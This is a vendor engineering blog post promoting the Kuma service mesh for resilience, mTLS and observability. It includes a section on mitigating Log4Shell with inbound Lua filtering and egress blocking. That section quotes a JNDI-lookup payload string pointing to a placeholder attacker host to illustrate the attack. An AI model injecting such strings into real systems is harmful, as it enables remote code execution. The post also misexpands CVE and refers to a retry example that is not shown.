Engineering
April 12, 2023
7 min read

Stop Wasting Your Engineers’ Time and Start Improving Your System Stability with Kuma

Marcin Skalski

At first glance, that does not make sense, right? The title suggests you should invest your DevOps/Platform team’s time in introducing a new product that most likely will:

  • increase the complexity of your platform
  • increase resource usage
  • increase the cost of your platform
Through this article, we’ll show you that even though those initial concerns are justified, the overall benefits that can be realized by adopting a service mesh can outweigh any initial effort and investments.

Life without service mesh

Let’s assume we’re working with microservices (or at least we’re migrating to microservices), and we don't use service mesh yet.

When working with microservices, you want freedom — freedom of language, tools, or freedom to make architectural choices. (More on this here).

In most cases, this leads to having at least two primary programming languages and a couple of frameworks that power your services. Because a lot of your functionality is now split between services, most of your communication occurs through the network via HTTP/GRPC or asynchronously via message brokers like Kafka.

To say the least, network communication is hard. And if you’re still getting started in this area, this fantastic article on the 8 fallacies of distributed computing is required reading!

When considering reliability, we have methods to deal with those problems using mechanisms like timeouts, retries, circuit breakers, and so on. Likewise, for security, we can increase our “zero trust” posture by utilizing mTLS (which is hard to do right — we’ll talk more about this in the next section). So if there are existing ways of handling some of these issues, then what's the problem? We just need to start using them, and we’re good to go, right? Right?

Unfortunately, as with most things, it’s not that easy!

Let’s look at mTLS configuration in Go for starters. It’s not just setting a few flags and providing certs (even though there are some great tutorials on how to do that. You’re now on the hook to manage certs on your own, in addition to taking care of cert rotation and revocation. You need to transparently reload certs if you want zero downtime. You also need to set up the correct MinTLSVersion.

This is just the beginning, and even after setting this up, you have to think about stability (timeouts, retries, circuit breakers). Imagine how much time it could take for a single service, and then multiply it by the number of services in your infrastructure.

This can easily take hundreds (or thousands!) of hours, during which you could be instead focusing on delivering business value for your customers in the way of better user experience or additional functionality.

You can solve this issue partially with standardization and service templates. But then you lose your freedom. And when something changes (e.g., you change defaults or add a new mechanism) you need full-blown migration in order for it to start working. Large-scale migrations are nicely described in this talk. Long story short: migrations take a long time, and are often not successful.

Kuma to the rescue!

By now, we can all agree that running microservices or any large distributed system is hard. But there’s a way to get rid of those problems — or at least some of them. And as you probably already guessed, service mesh is that solution!

Service mesh originated from an idea that networking communication could be simplified and easily secured, and that the network layer provides a common way for us to abstract key functionality out of service code and libraries into a shared layer. Kuma is a perfect example of how those hard problems can be simplified and made more understandable for users.

For those who don't know, service mesh works by injecting lightweight data plane proxies alongside your services. Each data plane proxy gives you:

  • mTLS
  • Service discovery
  • Resiliency
    • Timeouts
    • Retries
    • Circuit breaking
    • Rate limiting
  • Observability
    • Metrics
    • Access logging
    • Tracing
Those mechanisms can all be dynamically configured from the control plane. (More on how service mesh works can be found here.)

Now just imagine how much time engineers in your organization would spend to introduce and properly configure those capabilities in their services individually. Because configuration is delivered to data plane proxy via network and is automatically applied, introducing these features to your service can be done without any restarts, redeploys, or downtime.

You may ask, “Why use Kuma if there are other service mesh products out there?”

We believe that Kuma, at the moment, is one of the simplest service meshes around, combining an intuitive UX with a very powerful and configurable set of policies and functionality. This is doubly true since the introduction of our new targetRef based policies. Thanks to new targetRef policies, it’s really simple to configure something like retries for your service, as shown below:

Here we have a basic policy that will configure a retry on every 5xx HTTP error, from the web service to the backend service. And that's it. You don't need to add another library to your service, implement or test anything and go through a full release cycle to start retrying errors. All it takes is 10 minutes or less to write and apply YAML config!

Nullifying the Log4Shell CVE with service mesh

There is one example we find particularly interesting. You can fix a particular class of CVEs (Common Vulnerabilities and Exploits) globally without even a single restart of your services.

Let’s take a look at the famous Log4Shell vulnerability, where, because of a Log4J vulnerability, attackers could download their executables to your machine simply by logging the string: ${jdni:ldap://[attacker.com:1234]/a}.

This could be (for example) sent in an HTTP request to your service and if you were to log the incoming traffic, the malicious code would be run. The obvious solution would be to upgrade Log4J, but this takes time to update and then deploy new versions everywhere and can be problematic if you don't release on a daily basis. And even if you deploy daily, this is something your engineers will have to implement and deploy in every service, which can be stressful and error-prone when done in a rush.

There are two ways we could approach this problem with service mesh. First, we could add inbound traffic filtering. We can do this by creating a really simple Lua filter that will drop any incoming traffic containing suspicious content in path, headers or body (See: How to add Lua filter.)

The second strategy is to block all traffic outside of Mesh except for the trusted destinations. In Kuma we can do this easily with ZoneEgress and External Services. We can configure our mesh so that it will block any traffic simply by disabling passthrough mode and then configure trusted destinations as External Services. Again, we can do all of it without any development and deployments.

What if I don't do microservices?

Since the first appearance of “microservices” term in 2011 during an architect's workshop near beautiful Venice, the world has changed. But the changes weren't as spectacular as some may think.

According to an O'Reilly survey from 2020, around 30% had been running microservices for at least three years. Adoption of microservices grows, but we can see that many organizations are still far from adopting this approach. That's why Kuma has extensive support for classic deployments in the form of Universal mode.

You can easily deploy Kuma in your environment — no matter if you’re running Kubernetes, VMs, or bare metal. Furthermore, this gives you the possibility to easily migrate to microservices in the future if needed or can help you modernize your infrastructure by adding k8s clusters alongside your classic infrastructure.

Wrapping up

In summary, introducing complex networking and developing good standards that will improve your product stability can be very challenging. It can take a lot of time to implement and deploy different solutions, and even then, full-scale migrations take time and money. During this time, engineers in your organization are tied up in these efforts and won't be able to create value for your customers.

Kuma can help you mitigate a good portion of these problems and improve the overall stability of your product faster and with lower cost. This article is an introduction to the series, in which we’ll talk further in depth about all the resiliency mechanisms that Kuma offers.